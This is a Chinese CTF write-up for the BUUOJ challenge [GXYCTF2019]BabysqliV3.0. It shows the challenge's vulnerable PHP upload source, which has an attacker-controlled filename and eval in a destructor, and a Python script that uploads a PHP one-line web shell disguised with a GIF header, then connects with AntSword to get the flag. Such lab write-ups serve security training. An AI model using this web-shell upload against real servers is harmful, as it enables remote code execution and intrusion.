摘要
文件上传、phar反序列化
#### 爆破
进入题目是一个登录界面,可知用户名是admin,爆破得密码为password
,进入上传页面
源码读取
页面通过file
参数加载文件,伪协议读取upload
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73
| <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<form action="" method="post" enctype="multipart/form-data"> 上传文件 <input type="file" name="file" /> <input type="submit" name="submit" value="上传" /> </form>
<?php error_reporting(0); class Uploader{ public $Filename; public $cmd; public $token;
function __construct(){ $sandbox = getcwd()."/uploads/".md5($_SESSION['user'])."/"; $ext = ".txt"; @mkdir($sandbox, 0777, true); if(isset($_GET['name']) and !preg_match("/data:\/\/ | filter:\/\/ | php:\/\/ | \./i", $_GET['name'])){ $this->Filename = $_GET['name']; } else{ $this->Filename = $sandbox.$_SESSION['user'].$ext; }
$this->cmd = "echo '<br><br>Master, I want to study rizhan!<br><br>';"; $this->token = $_SESSION['user']; }
function upload($file){ global $sandbox; global $ext;
if(preg_match("[^a-z0-9]", $this->Filename)){ $this->cmd = "die('illegal filename!');"; } else{ if($file['size'] > 1024){ $this->cmd = "die('you are too big (′▽`〃)');"; } else{ $this->cmd = "move_uploaded_file('".$file['tmp_name']."', '" . $this->Filename . "');"; } } }
function __toString(){ global $sandbox; global $ext; return $this->Filename; }
function __destruct(){ if($this->token != $_SESSION['user']){ $this->cmd = "die('check token falied!');"; } eval($this->cmd); } }
if(isset($_FILES['file'])) { $uploader = new Uploader(); $uploader->upload($_FILES["file"]); if(@file_get_contents($uploader)){ echo "下面是你上传的文件:<br>".$uploader."<br>"; echo file_get_contents($uploader); } }
?>
|
这filename就直接控制了……
flag
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25
|
import requests
shell = "<?php @eval($_POST['ok']) ?>"
prefix = "GIF8!"
con = prefix + "\n" + shell
url = "http://52b220e2-8b31-4060-bb76-cb7660d396fe.node4.buuoj.cn:81/upload.php?name=a.php" cookie = {"PHPSESSID": "6d3b93db04ced5af36d7fbc5fe9771a2"}
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0'} files = { 'file': ('1.php', con, 'image/jpeg'), }
response = requests.post(url=url, headers=headers, files=files, cookies=cookie)
res = response.text print(res)
|
蚁剑连接,找flag.php
获取flag……
phar
[GXYCTF2019]BabysqliV3.0-phar反序列化